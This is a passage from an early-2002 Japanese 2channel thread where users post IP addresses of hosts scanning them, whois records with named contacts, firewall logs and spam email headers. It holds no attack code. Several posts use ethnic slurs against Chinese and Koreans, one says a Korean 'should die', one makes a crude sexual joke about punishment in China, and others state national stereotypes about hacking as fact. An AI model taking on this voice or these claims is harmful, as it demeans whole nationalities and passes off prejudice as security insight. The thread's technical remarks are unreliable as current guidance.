そうだ、ブラウジングだけの話じゃない、か。

135 :名無しさん@お腹いっぱい。 :02/03/09 17:25
>>132
漏れもそいつから何回もアタックかけられてる。
どうも入れないらしいが(w

136 :名無しさん@お腹いっぱい。:02/03/09 17:34
1.中国
2.韓国
3.アメリカ

日本はまだ一回しかない。

137 :名無しさん@お腹いっぱい。:02/03/10 16:28
1.シナ畜
2.犬喰い
他はほとんどない。
入れないのが悔しくて、犬を蹴飛ばして食べてるんじゃないのかな?


138 :名無しさん@お腹いっぱい。:02/03/10 16:33
なんで中国の方達はいつも悪い事しでかすんだ?2チャンも狙いやがった
しさ、密漁もするしさ、犯人引き渡さないしさ、反省しないしさ、やる事
がインケンなんだよ。

139 :名無しさん@お腹いっぱい。:02/03/10 16:44
また・・・。
61.137.60.137
マジでODAも円借款もうち切れ

140 :名無しさん@お腹いっぱい。:02/03/12 21:50
キムチうざい

141 :名無しさん@お腹いっぱい。:02/03/15 23:26
61.96.29.118 <奸国

142 :名無しさん@お腹いっぱい。:02/03/16 15:17
こいつどうにかしてくれ。
210.175.13.57

143 : :02/03/16 15:46
From:< Iris1186c15@aol.com >
Reply-To:< Iris1186c15@aol.com >
To:***
Subject:Free access to the top adult paysites
Date:***
Received: from [211.250.139.253] by hotmail.com (3.2) with ESMTP id ***
Received: from unknown (HELO mta05bw.bigpond.com) (39.102.219.124)by asy100.as122.sol.superonline.com with asmtp;***
Received: from unknown (HELO pet.vosn.net) (26.46.101.37)by smtp013.mail.yahoo.com with local;***
Received: from 184.93.8.161 ([184.93.8.161]) by rly-xr02.mx.aol.com with smtp;***
Received: from unknown (HELO mailout2-eri1.midsouth.rr.com) (37.31.185.128)by hotmail.com with NNFMP;***
Received: from unknown (HELO rly-xw05.mx.aol.com) (48.72.139.94)by rly-xw05.mx.aol.com with SMTP;***
From Iris1186c15@aol.com
Message-ID:< yklgiotuioputipipofguiio545@aol.com >
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
---
Get your FREE password to the best adult paysites on the web
using our NEW secret technique - for Ultrapasswords.com members only!
No gimmicks, just FREE access to any paysite you choose!

You got this email because you subscribed,
to unsubscribe go here.
http://www.ultrapasswords.com/remove/remove.html

144 : :02/03/16 15:53
midsouth.rr.com
kcmx01.mgw.rr.com (pri=50)
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
lamx01.mgw.rr.com (pri=50)
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
------
bigpond.com
bigpond.com
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。

145 :名無しさん@お腹いっぱい。:02/03/17 11:50
216.5.194.90
Rohlig JHB (NETBLK-SDTA-385)
6 Blackwood Avenue Parktown
Rosebank, Gauteng 2194
ZA

Netname: SDTA-385
Netblock: 216.5.194.80 - 216.5.194.95

Coordinator:
Mulligan, Rian (RM1010-ARIN) rianm@rohlig.co.za
(011) 403-4039

Record last updated on 29-Jul-2000.
Database last updated on 15-Mar-2002 19:57:41 EDT.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.


------------------------------------------------------------------------------

・・・ZAってどこだ?

146 :名無しさん@お腹いっぱい。:02/03/17 11:59
ザンビア アフリカか?

147 :名無しさん@お腹いっぱい。:02/03/17 11:59
ザイールか?(確認しないのにカキコ)

148 :名無しさん@お腹いっぱい。:02/03/17 13:06
zaは南ア

149 :Bear!!@Taipei:02/03/17 23:49
台湾在住。Apacheでサイト開設しているんだけど、Windows IIS系のセキュリティ
ホール探すロボットが毎日数十IPやってくるよ。
(root.exe とか cmd.exe で dir を試すやつね)

台湾はIPの割り当て幅が狭い関係で、国内(台湾)の同ISPのIPベースからが40
%位。2番手は韓国で30%位だな。
この2国は普及を急いだ分、セキュリティモラルが低いね。

あとは、大陸(中国ね)と米国かな。珍しいところではAUとかUK。

ftpサーバの方には anonymousチェックがフランス(リヨン)から入ってた。
ワレとかMP3の置き場にしようとしている模様なので、様子見中だよ。
大陸(中国)から、VirusToolの発信基地にされそうになったこともあったね。

サイトを放置しておくと、結構ボコられているのが判って面白い。でも、ADSL
で常時接続してる一般ユーザーのPCは、Virusの送り込みやら不正アクセス
がすごいんだろうなと思うよ。

--------------------------------
Taiwan GigaNet
危険!!*印はNimdaを送りつけるHP設置
--------------------------------
203.204.104.140
203.204.106.33 *
203.204.127.44 *
203.204.128.78
203.204.139.161
203.204.147.2 *
203.204.150.14
203.204.170.180
203.204.183.195
203.204.19.38
203.204.199.113
203.204.51.119

---------------------------------
Korea Network Information Center
hostmaster@nic.or.kr
---------------------------------
203.234.5.127
203.234.5.130
203.234.5.132
203.234.5.140
203.234.5.146
203.234.5.151
203.235.70.16
203.249.69.231
203.250.86.156

150 :はずかしながら:02/03/18 12:58
ちょっとまえに、Anti Elite Brazilian Crackersと名乗る連中にHP改ざんされてわけのわかんない
挙句にサーバーのCドライブみんな消されました。


151 :revenize@innovativeinsite.net :02/03/18 14:19
Return-Path:< revenize@innovativeinsite.net >
Received: from adsl-67-115-80-131.dsl.lsan03.pacbell.net (EHLOAries.innovativeinsite.net) (67.115.80.131) by ** with SMTP;**
Received: from localhost (steve@localhost) by Aries.innovativeinsite.net (8.11.4/8.11.4) with SMTP id **;**
Date:**
X-Authentication-Warning: Aries.innovativeinsite.net: steve owned process doing
Received: by Aries.innovativeinsite.net (bulk_mailer v1.13)
Subject: Free Nokia Cell Phone -- Limited time offer. Act NOW.
From: revenize@innovativeinsite.net
Reply-to: revenize@innovativeinsite.net
Message-ID:< 259637.4587328@revenize.com >
---
Phone free after instant rebate. Offer subject to credit approval
or deposit, and is available to customers activating a new line
of service on a one-year contract with VoiceStream Wireless.
Not all US markets are served by VoiceStream Wireless.
If you are in a non-VoiceStream Wireless area you will receive
another great offer from another major wireless company.
Other restrictions apply, see full offer for details.
Offer Expires. Offer may vary.
-----
This Message has not been sent to you arbitrarily.
You are receiving this message because you opted-in to receive
messages of this nature with one of our marketing partners.
If you would like to removed from future mailings, please click here,
and enter you email address in the unsubscribe form. Thank You.
http://www.innovativeinsite.net/cgi-bin/form!/smartlist-manager.pl
http://www.revenize.net/freephone/Offer.php?CID=69007

152 :名無しさん@お腹いっぱい。:02/03/18 15:48
person: Chinanet Hostmaster
address: A12,Xin-Jie-Kou-Wai Street
country: CN
phone: +86-10-62370437
fax-no: +86-10-62053995
e-mail: hostmaster@ns.chinanet.cn.net
nic-hdl: CH93-AP
mnt-by: MAINT-CHINANET
changed: hostmaster@ns.chinanet.cn.net 20000101
source: APNIC

person: Dong Zhou
address: Guangxi data comm.Bureau
address: 35 Minzhu Road
address: Nanning city
address: Guangxi 530015 China
country: CN
phone: +86-771-2628775

153 :名無しさん@お腹いっぱい。:02/03/19 03:57
「読売新聞社と韓国日報社がアジア各国でおこなった共同世論調査」
               (1995年5月23日・読売新聞)

『日本と韓国に対してそれぞれ否定的な印象を持っている各国人の割合』

中国人         対日37.8%   対韓31.1%
インドネシア人     対日13.9%   対韓33.3%
マレーシア人      対日 2.9%   対韓33.3%
タイ人         対日21.6%   対韓61.2%
ベトナム人       対日 1.1%   対韓41.3%

韓国人って日本はアジアで嫌われてるといってるけど、
なんだ、実際は韓国人の方が日本人より嫌われてるじゃん。
こんなのでよく偉そうな口がきけるもんだ。

154 : :02/03/19 08:29
もしかして
CIAとかって
かってに人のマシン覗けるワザもってんですか?ーー?


155 :名無しさん@お腹いっぱい。:02/03/20 02:00
>153
「偉そうな口」とはこのこと?
ttp://www.geocities.co.jp/HeartLand-Apricot/3493/projectk/pk61.html

156 :uuヨヨ:02/03/20 03:04
生で書き込んで荒らし(ホントは荒らしじゃない)してたら、名前調べられて曝された。
ただ「○○上げ」って感じだけど。

悔しいんだけどどうすればいい?

157 :名無しさん@お腹いっぱい。:02/03/20 05:42
KCIAなら可能

158 :creditreport@consumerpackage.net :02/03/20 14:53
From:CreditReport< creditreport@consumerpackage.net >
Reply-To: mailop@consumerpackage.net
To: jab1@complaints.em5000.com
Subject:have you seen what your credit report says
Date**
Received: from [209.114.196.171] by em5000.com with ESMTP id **
From mailop@consumerpackage.net **
X-Sender: consumerpackage.net
Errors-To: report@consumerpackage.net
Complain-To: abuse@consumerpackage.com
-----
Step 1: Get your FREE credit report so you can:
See what your lender sees
Identify possible credit inaccuracies
Keep track of the companies who have looked at your information
Step 2: Take advantage of the CreditCheck Monitoring Service. And try
it FREE for 30 days! It alerts you to changes on your report,
including:
New derogatory information
Recent credit inquiries
Indicators of possible credit fraud
Information and updates from credit experts
Credit dispute forms and helpful tips
Neighborhood and home sales reports
Assistance in accessing your DMV, Medical Information Bureau, and Social Security records
Unlimited FREE credit reports (with your regular membership)
-----
You received this email because you signed up at one of Consumer Media's websites or you signed up with a party
that has contracted with Consumer Media. To unsubscribe from our email newsletter, please visit
http://opt-out.consumerpackage.net/?e=jab1@complaints.em5000.com

159 :名無しさん@お腹いっぱい。:02/03/20 15:50
個人的ベスト3
1位 韓国(文句なしダントツ。ナントカしてくれ)
2位 中国(最近多い。湖北省あたりからのお客様多し)
3位 ブラジル(地球の裏側からひつこい)

米、英、豪はまれ
たまにマレーシアなど東南アジアも有り。
ドイツやフランスなんかのマイナーな都市からの
アタックだと、ついでにその都市について調べると、
ちょっと観光気分味わえて楽しい。
結構楽しみになってるかも・・・

160 :ESWH20020320@ombramarketing.com:02/03/21 00:02
From:emailsaver< ESWH20020320@ombramarketing.com >
To: jab1@complaints.em5000.com
Subject:Welcome to emailsaver!
Date**
Received: from [65.121.184.28] by em5000.com with ESMTP id **
Received: from [65.121.184.28]by outbounda.ombramarketing.com (10.16.1.150) with ESMTP;**
65_121_184_28_seamusc@networkcommerce.com
From ESWH20020320@ombramarketing.com
Message-ID:< 15978546325875987ab@ombramarketing.com >
----
Why are you receiving this email?
Answer: You registered at a Web site and expressed interest in receiving 3rd party online offers.
The Web site where you registered may entrust select partners to email valuable offers and promotions to you.
Emailsaver is one of those entrusted partners.
---
What's in it for you?
Answer: We search the Web for the best offers and freebies available.
You can use the offers of your choice as you see fit. You'll save money on gifts,
household items, music, DVDs, long distance rates, life and health insurance,
etc, etc. Of course, this service is no cost to you.
---
If you're not interested in the benefits of emailsaver, simply follow the unsubscribe instructions below.
This is a recurring mailing. If you wish to unsubscribe from this list,
please click here, reply to this email with "unsubscribe" as the subject, or copy and paste
the link below into your browser address bar. Any third-party offers contained in
this email are the sole responsibility of the offer originator.
http://0mbra.com/c/ES/o.jsp?U=012345678&E=ESWH20020320@ombramarketing.com&P=ESWH20020320

161 : 65.121.184.27:02/03/22 15:51
From:emailsaver< ESAC20020000@ombramarketing.com >
To: jab1@complaints.em5000.com
Subject:Save Money-Get3PrinterCartridgesforthePriceof1
Date**
Received: from [65.121.184.26] by em5000.com with ESMTP id **
Received: (qmail invoked from network);**
Received: from unknown (65.121.184.27) by 10.12.220.89 with SMTP **
From ESAC20020321@ombramarketing.com
Message-ID:< JavaMailetl@ombramarketing.com >
---
Why are you receiving this email?
Answer: You registered at a Web site and expressed interest in receiving 3rd party online offers.
The Web site where you registered may entrust select partners to email valuable offers and promotions to you.
Emailsaver is one of those entrusted partners.
What's in it for you?
Answer: We search the Web for the best offers and freebies available.
You can use the offers of your choice as you see fit. You'll save money
on gifts, household items, music, DVDs, long distance rates,
life and health insurance, etc, etc. Of course,
this service is no cost to you.
If you're not interested in the benefits of emailsaver, simply follow the unsubscribe instructions below.
This is a recurring mailing. If you wish to unsubscribe from this list, please click here,
reply to this email with "unsubscribe" as the subject, or copy and paste the link below into your browser address bar.
Any third-party offers contained in this email are the sole responsibility of the offer originator.

http://0mbra.com/c/ES/o.jsp?U=012345678&E=ESAC20020000@ombramarketing.com&P=ESAC20020000

162 :名無しさん@お腹いっぱい。:02/03/22 23:38
めずらしく、ニュージーランドからお客さんが来てた。
sshが彼は気になったらしいです。

210.55.106.223

inetnum: 210.55.100.0 - 210.55.107.255
netname: WEBINTERNET-NZ
descr: Web InterNet
descr: Auckland
country: NZ
admin-c: DG44-AP
tech-c: AJ18-AP
notify: nic@netgate.net.nz
mnt-by: NZTELECOM
changed: don@netgate.net.nz 20001013
source: APNIC

韓国はもちろん香港とか日本はめずらしくないけどさ。
最近こっち方面は久々だった。


163 :名無しさん@お腹いっぱい。:02/03/23 06:27
>>159
ブラジルはセキュリティ意識が希薄(というか無いに等しい)ので、
何かに感染してるか踏み台にされてる可能性が高いかも。

164 :名無しさん@お腹いっぱい。:02/03/23 12:24
みなさん、こんにちは。
北海道は桜がまだですが、東京は満開とのことで、帰って見るのが楽しみです(もう終わり?)。
さて、強風で、中国からの黄砂でそこら中が汚くなっています。
風で肌寒かったですが、郊外で山中に入ると雪が残っているものの、街中には雪は全くなく、温暖化の影響を感じます。
札幌の街中を、数時間ですが、散策しました。
セレクトショップを一通り回りましたが、やはり東京と同様、若者中心のラインナップで、ソブリンハウスのような大人向けのショップは見つけられませんでした。
でも、ラインナップにない靴なども取り寄せなども可能とのことで、不自由はしないように思います。
事前に何も情報収集しないで、街を歩いたので、本当は他にもいろいろと靴情報があったのかもしれません。


165 :_:02/03/23 21:38
あのー、ノートンを無効にしといたまま
Hなサイトにいって、いきなり、ハードディスクがカリカリいって
電源がきれたんですけど、それって、ハッキングされてるのですか?

166 :cheshire-cat:02/03/23 21:42
>>165
Norton Antivirusを有効にして、その時間に形成されたキャッシュを開く。
「ジャキッ」って音がして警告がでるかどうか、試したらどうだろうか。

167 :_:02/03/23 21:50
>>166
レスどうもです。
今からやってみます

168 :名無しさん@お腹いっぱい。:02/03/24 16:30
☆ チン                              
        ☆ チン  〃  ∧_∧   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
          ヽ ___\(\・∀・)< ポートスキャンまだぁ〜?
             \_/⊂ ⊂_)_ \____________
          / ̄ ̄ ̄ ̄ ̄ ̄ ̄/|
        l ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| .|
        |  ○ みかん ○  |/

169 :名無し:02/03/24 21:58
先日ZAを入れてみました、そしたら毎日20〜25回も警告が出るので自分のPCは
今までこれほど無防備だったのか・・・・・と驚いてます。

61.202.88.157
61.170.144.229
61.10.95.140

程なく気付いた事なんですが似たようなIPからのアクセスが多いです。このスレ
では常識みたいですが頭が61のこれらは皆中国からと考えて良いの??

170 :名無しさん@お腹いっぱい。:02/03/25 04:29
195.6.100.128 ここどこだよ?

171 :名無しさん@お腹いっぱい。:02/03/25 13:30
日付: 03/25/02 時刻: 12:50:28
未使用ポート遮断機能が通信を遮断しました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 218.27.199.17,http

日付: 03/25/02 時刻: 12:50:28
未使用ポート遮断機能が通信を遮断しました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 218.60.71.1,http

日付: 03/25/02 時刻: 12:36:47
未使用ポート遮断機能が通信を遮断しました。 詳細:
インバウンド TCP 接続
リモートアドレス、 ローカルサービスは 218.11.130.203,http

すべて中国かハア暇だね

172 : :02/03/25 14:21
毎日同じとこから遊びにきている人がいるんですが、どうしましょうか?

210.81.153.68
↑こいつです。

173 :名無しさん@お腹いっぱい。:02/03/25 14:22
>>169
whoisしろよ

174 :名無しさん@お腹いっぱい。:02/03/25 17:11
>>172
http://210.81.153.68/

175 :名無し:02/03/25 17:19
% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

Sinfonet (NETBLK-SINFONET) SINFONET 200.46.0.0 - 200.46.159.255
Roberto Motta (NETBLK-NETBLK-SINFONET-569) NETBLK-SINFONET-569
200.46.105.80 - 200.46.105.95

To single out one record, look it up with "!xxx", where xxx is the
handle, shown in parenthesis following the name, which comes first.

The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information

この方面の知識は無いので何処の誰かさっぱりわかりません、せめて国名・団体
位は知りたいので誰か分かる人教えて下さい

176 :名無しさん@お腹いっぱい。:02/03/25 17:36
>>169
ここで調べて味噌
http://www.mse.co.jp/ip_domain/

177 : :02/03/28 22:20
1支那畜
2チョンコロ
3イタリア
中韓は日曜になるとなぜか来ない(w
ワールドカップでチョンコロがビザ無しで来るのかと思うと今から鬱になる

178 :プロ串君:02/03/28 23:03
伊太公が毎日8080ポートにCONNECTかけてきます(藁

179 :名無しさん@お腹いっぱい。:02/03/28 23:49
ファイアウォールは 66.8.238.40 (TCP Port 3852) [TCP Flags: S]. から、
このコンピュータ (SMTP) への インターネット アクセスをブロックしました。
日時: 02/03/28 22:00:58

なんなんですか??

180 : :02/03/30 03:02
>179
踏み台メル鯖探しやね…

181 :名無しさん@お腹いっぱい。:02/03/30 16:49
207.46.226.17これってどこですか?

182 :名無しさん@お腹いっぱい。:02/03/30 16:58
131.107.1.10ってどこですか?

183 :名無しさん@お腹いっぱい。:02/03/30 17:10
>>181 >>182
ここで調べて味噌
http://www.mse.co.jp/ip_domain/
http://visualroute.visualware.com/

172.16.11.199って何…?
何かVisualRouteで検索かけたらPrivate useって出たんですが…。

184 :183:02/03/30 17:12
いや、そこからポートスキャンされたんだ。

185 :名無しさん@お腹いっぱい。:02/03/31 10:37
>183
あいがてふ

186 :名無しさん@お腹いっぱい。:02/03/31 17:06
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.221.96.0-218.221.127.0
b. [ネットワーク名] SO-NET
f. [組織名] SO-Net サービス
g. [Organization] SO-Net Service
m. [運用責任者] MK2734JP
n. [技術連絡担当者] YY1426JP
n. [技術連絡担当者] SW314JP
p. [ネームサーバ] dnss3.so-net.ne.jp
p. [ネームサーバ] dnss4.so-net.ne.jp
p. [ネームサーバ] dnss5.so-net.ne.jp
p. [ネームサーバ] dnss6.so-net.ne.jp
p. [ネームサーバ] dnss7.so-net.ne.jp
p. [ネームサーバ] dnss8.so-net.ne.jp
p. [ネームサーバ] dnss9.so-net.ne.jp
y. [通知アドレス] jin@scn.co.jp
y. [通知アドレス] wtn@scn.co.jp
[割当年月日] 2002/01/24
[返却年月日]
[最終更新] 2002/01/24 10:24:04 (JST)
ip-alloc@nic.ad.jp


187 :名無しさん@お腹いっぱい。:02/03/31 17:08
% Rights restricted by copyright. See http://www.apnic.net/db/dbcopyright.html
% (whois7.apnic.net)

inetnum: 219.0.0.0 - 219.63.255.255
netname: BBTECH
descr: BB Technology Corp.
descr: Nation wide network in Japan
country: JP
admin-c: TT123-AP
tech-c: ST222-AP
mnt-by: APNIC-HM
mnt-lower: MAINT-JP-BBTECH
changed: hostmaster@apnic.net 20011031
source: APNIC

person: Takeshi Tsutsui
address: Nihonbashi Hakozaki bldg.
address: 24-1,Nihonbashi Hakozaki-Cho
address: Chuo-ku,Tokyo,103-0015,Japan
country: JP
phone: +81-3-5642-7796
fax-no: +81-3-5641-7601
e-mail: ttsutsui@softbank.co.jp
nic-hdl: TT123-AP
mnt-by: MAINT-JP-BBTECH
changed: stsuruma@softbank.co.jp 20011105
source: APNIC

person: Satoru Tsurumaki
address: Nihonbashi Hakozaki bldg.
address: 24-1,Nihonbashi Hakozaki-Cho
address: Chuo-ku,Tokyo,103-0015,Japan
country: JP
phone: +81-3-5642-7796
fax-no: +81-3-5641-7601
e-mail: admin@bbtec.net
nic-hdl: ST222-AP
mnt-by: MAINT-JP-BBTECH
changed: stsuruma@softbank.co.jp 20020109
source: APNIC


188 :第三者中継可能?:02/04/05 06:53
From:"Greetings"< Greetings@amazingofferings.com >
Reply-To: mailings@amazingofferings.com
To***
Subject:Welcome New Member!
Date***
Received: from [216.177.60.51] by amazingofferings.com with ESMTP **
Received: from oc40 (216.177.60.40:9381) by om01.yourmailsource.com (LSMTP for Windows NT v1.1b) with SMTP id < mailings_amazingofferings_com@om46.yourmailsource.com>
Dear &first_name;:

Being a valued member of ImustPlay gives you the right and privilege to receive a free subscription to AmazingOfferings newsletter.

The newsletter is packed with exciting and money saving offers for you and your family.

You'll get daily emails containing valuable discounts, special offers, sweepstakes, and entertainment reviews from companies such as AOL/Time Warner, AT&T, First USA Bank, BMG, Chase and Earthlink!

We respect your privacy. If you decide to stop receiving these offers, then simply click here and your name will be taken off our list.

If the link above doesn't work, simply cut this URL and paste it into the address bar and you'll be directed to the unsubscribe page.

Life is short - why not play, have fun, and keep getting these tremendous offers sent to you?

Thank you for your time.
Sincerely,
Your friends at AmazingOfferings


http://www.amazingofferings.com/click.asp?lnk=405&email=mailings@amazingofferings.com

189 :jab1@complaints.2np.net:02/04/06 11:09
From:JMC MarketingConcepts< jab1@lists.2np.net >
To: mailings@amazingofferings.com
Subject:Are You Irresistable?
Date:***
Received: from [168.143.122.147] by 216.177.60.40 with ESMTP id ***
From 0123456789-yourmailsource.com
X-Info: To report abuse forward this mail to jab1@complaints.2np.net
Please include all mail header fields!
Message-ID:< jab1_complaints_2np_net@frodo6.2np.net >
-----
http://www.amazingofferings.com/click.asp?lnk=404&email=mailings@amazingofferings.com

McGavin@hotmail.com supports@porncinema.biz erin@caddnet.com bryan_green@caddnet.com
From:"Greetings"< Greetings@amazingofferings.com >
Reply-To: mailings@amazingofferings.com
From:JMC MarketingConcepts< jab1@lists.2np.net >

190 :   :02/04/06 23:02
こいつよくスキャンしてくるんだが何者か、誰か教えてくれ。
     biwa13.he.net


191 :名無しさん@お腹いっぱい。:02/04/07 03:22
>>190
http://aoki2.si.gunma-u.ac.jp/BotanicalGarden/HTMLs/biwa.html

192 :名無しさん@お腹いっぱい。:02/04/07 12:50
>>190 2ch

193 :64.119.35.66:02/04/14 22:53
From:USA CreditCard< usacard@marketingontarget.net >
To: remove@nethydro.com
Subject:Get a $5000 Credit Limit
Date**
Received: from [64.119.35.66] by nethydro.com with ESMTP id **
From usagold-89325874.9@marketingontarget.net
X-Sender:marketingontarget.net
Complain-To: abuse@marketingontarget.com

Dear Friend,
Get Approved for an Unsecured Gold Credit Card Instantly Online!
Now you can get Guaranteed instant online Approval for an Unsecured Gold Credit Card
with a $5,000 credit line. That's right!!! As long as you are at least 18, a U.S resident
with at least $800 in monthly household income and are not currently in bankruptcy,
your APPROVAL IS GUARANTEED! Enjoy great merchandise while improving your credit
because the USA Gold Card reports your good credit to all three major bureaus.
We want to help you establish or reestablish your credit today!
Don't wait any longer - Apply Online Today and get the credit you deserve!
You received this email because you signed up at one of Marketingontarget.com's websites
or you signed up with a party that has contracted with Marketingontarget.com.
To unsubscribe from our newsletter, please visit
http://opt-out.marketingontarget.net/?e=abuse@marketingontarget.com.

194 :名無しさん@お腹いっぱい。:02/04/19 08:31
>>190
●不正PROXY? 2chポートチェックサーバ最新情報
http://pc.2ch.net/test/read.cgi/sec/1002776091/


195 :名無しさん@お腹いっぱい。:02/05/11 09:47
>187
あ、これうちにも来た。ソフトバンク?

196 :名無しさん@お腹いっぱい。:02/05/11 13:05
61.79.139.206

197 :(;´Д`)ハァ:02/05/11 16:19
203.218.127.15
キムチ野郎は氏ね

198 :名無しさん@お腹いっぱい。:02/05/11 16:37
うちのノックアクセスランキング
@韓国
A中国
Bヨーロッパ
C米国
Dうちの女房

199 :名無しさん@お腹いっぱい。:02/05/11 19:38
中国からが1番多いよ。
あいつらの国じゃ、ハッキングは死刑だったはず。
根性があるな〜。

200 :cheshire-cat:02/05/11 19:49
>>199
>ハッキングは死刑だったはず
んな訳きゃないって思いますが。

201 :名無しさん@お腹いっぱい。:02/05/12 01:15
中国でハッキングすると、男は80歳の老婆とエッチの刑、女は馬とエッチの刑。
これホントの話アルヨ。

202 :名無しさん@お腹いっぱい。:02/05/13 17:02
アイスランド
adsl11-66.du.simnet.is

203 : :02/05/14 18:48
cpa@OIN-1.com
offers@deal123.net
equalamail@opt-in.coopt.com
vistaprint@offer888.net
fsween@talk21.com
alainebeshore4786@excite.com
funnymoney@ofr.mb00.net
cpa@oin.oin-1.com
unsubscribe@emailoffersdirect.com
offers@offers123.com
news@ultraxxxpasswords.com
offers@offers123.net
Send an email with the word 'remove' in the subject line to remove@OIN-1.com
Or you may mail us at:PO BOX 810052 Boca Raton, Fl 33481-0052
To unsubscribe from the Offer888.com list,
visit http://opt-out.offer888.net/?e=vistaprint@offer888.net
http://opt-out.offer888.net/?e=
* To remove yourself from this mailing list, point your browser to:
http://i.mb00.net/remove?funnymoney
* Enter your email address ( funnymoney@ofr.mb00.net ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney".


204 :名無しさん@お腹いっぱい。:02/05/14 20:36
>1
http://z.ccz.cc/bbs/log/access_log
ここにアクセスするのは、クラックなのか?

205 :スパム潰し:02/05/15 14:32
Received: from 211.57.215.226 (HELO 211.57.216.195)
(211.57.215.226) by **.jp with SMTP
Received:from[63.85.85.236] by smtp-server6.tampabay.rr.com with SMTP
Received:from unknown(124.215.35.163) by rly-xw01.mx.aol.com with QMQP
Received:from unknown(28.35.188.67) by rly-xl04.mx.aol.com with esmtp
Received: from rly-xw01.mx.aol.com ([153.196.56.114])
by lax-ca.osd.concentric.net with SMTP
From:ltxcLaura< jfslaura23@hotmail.com >
CC: coopt@opt-in.coopt.com funnymoney@ofr.mb00.net
equalamail@opt-in.coopt.com
Subject:Hey! mgivu
Sender:ltxcLaura< jfslaura23@hotmail.com >
X-Mailer: Microsoft Outlook Express 5.50.4133.2400

206 :名無しさん@お腹いっぱい。:02/05/15 17:55
この2人うざすぎ。交換共有厨は氏ね。

FWIN,2002/05/15,16:55:22 +9:00 GMT,64.167.129.170:3260,218.47.2**.***:6346,TCP (flags:S)
FWIN,2002/05/15,16:55:23 +9:00 GMT,212.194.102.39:4790,218.47.2**.***:6346,TCP (flags:S)
FWIN,2002/05/15,16:55:30 +9:00 GMT,64.167.129.170:3273,218.47.2**.***:6346,TCP (flags:S)
FWIN,2002/05/15,16:55:35 +9:00 GMT,212.194.102.39:4801,218.47.2**.***:6346,TCP (flags:S)
(中略)
FWIN,2002/05/15,17:40:39 +9:00 GMT,64.167.129.170:2959,218.47.2**.***:6346,TCP (flags:S)
FWIN,2002/05/15,17:40:39 +9:00 GMT,212.194.102.39:4624,218.47.2**.***:6346,TCP (flags:S)
FWIN,2002/05/15,17:40:45 +9:00 GMT,212.194.102.39:4636,218.47.2**.***:6346,TCP (flags:S)
FWIN,2002/05/15,17:40:56 +9:00 GMT,64.167.129.170:2979,218.47.2**.***:6346,TCP (flags:S)
(中略)
FWIN,2002/05/15,17:52:31 +9:00 GMT,64.167.129.170:3902,218.47.2**.***:6346,TCP (flags:S)
FWIN,2002/05/15,17:52:32 +9:00 GMT,212.194.102.39:3635,218.47.2**.***:6346,TCP (flags:S)
FWIN,2002/05/15,17:52:44 +9:00 GMT,64.167.129.170:3922,218.47.2**.***:6346,TCP (flags:S)
FWIN,2002/05/15,17:52:46 +9:00 GMT,212.194.102.39:3653,218.47.2**.***:6346,TCP (flags:S)

207 :名無しさん@お腹いっぱい。:02/05/15 20:12
>>206
MX厨房は帰れ。

208 :第三者中継:02/05/16 11:20
speeddeals.com (pri=0)
接続に失敗:ネットワークが混雑しているか、サーバが停止している可能性があります。
-----   
mail.mattmontalto.com (pri=0)
問題あり:不正な中継を受け付けます。
(24.168.101.40)
ORDB database...登録されていません。
maps realtime blackhole list...登録されていません。

To unsubscribe from the Offer888.com list,
visit http://opt-out.offer888.net/?e=zgjmy@yahoo.ca
http://opt-out.offer888.net/?e=
* To remove yourself from this mailing list, point your browser to:
http://i.mb00.net/remove?funnymoney
* Enter your email address ( zgjmy@yahoo.ca ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney".

To unsubscribe from the Offer888.com list,
visit http://opt-out.offer888.net/?e=offers@speeddeals.com
http://opt-out.offer888.net/?e=
* To remove yourself from this mailing list, point your browser to:
http://i.mb00.net/remove?funnymoney
* Enter your email address ( offers@speeddeals.com ) in the field
provided and click "Unsubscribe". The mailing list ID is "funnymoney".

209 :名無しさん@お腹いっぱい。:02/05/19 22:00
61.96.34.116
韓国うざい。

inetnum: 61.96.0.0 - 61.111.255.255
netname: KRNIC-KR
descr: KRNIC
descr: Korea Network Information Center
country: KR
admin-c: HM127-AP
tech-c: HM127-AP
remarks: ******************************************
remarks: KRNIC is the National Internet Registry
remarks: in Korea under APNIC. If you would like to
remarks: find assignment information in detail
remarks: please refer to the KRNIC Whois DB
remarks: http://whois.nic.or.kr/english/index.html
remarks: ******************************************
mnt-by: APNIC-HM
mnt-lower: MNT-KRNIC-AP
changed: hostmaster@apnic.net 20010321
changed: hostmaster@apnic.net 20010606


210 :スパム晒し:02/05/20 12:22
From: Yourapproved@allpreapproved.com < cpa@oin.oin2.com >
To: contentwatch@Equalamail.emailsvc.net support@equalamail.com
ES2044_20020515_665@link2buy.com remove@listmgr.clickformail.com
Subject:ClaimYourNewCreditCardNow!
Received:from [65.118.64.253]by with ESMTP id **
Received: from cpa(65.118.64.250) by
lsmail8.oi2.com (LSMTP for Windows NT w3.1a) with SMTP id <12.00024171@lsmail8.oi2.com>
From cpa@OIN.OIN2.COM

Claim Your New Credit Card Now!
It Doesn't Matter if You Have:
BAD CREDIT - NO CREDIT - LOW INCOME - PAST BANKRUPTCY
Do You Meet These Criteria?
1. Live in the United States?
2. Have a Social Security Number or Taxpayer Id Number?
3. 18 Years of Age or Older?
4. Have a Valid Checking or Savings Account?
5. Have Valid Job or other Income of at Least $750.00/month?
6. Have a Home Phone Number(Does Not Have to Be In Your Name)?
7. No Pending Bankruptcy (Discharged Bankruptcies are OK)?
If you answered YES to all of these simple questions we GUARANTEE
that you will receive up to 5 credit cards with up to a $8000 credit limit.
This email is not sent unsolicited. This is an Opt-In Network mailing!
This message is sent to subscribers ONLY.
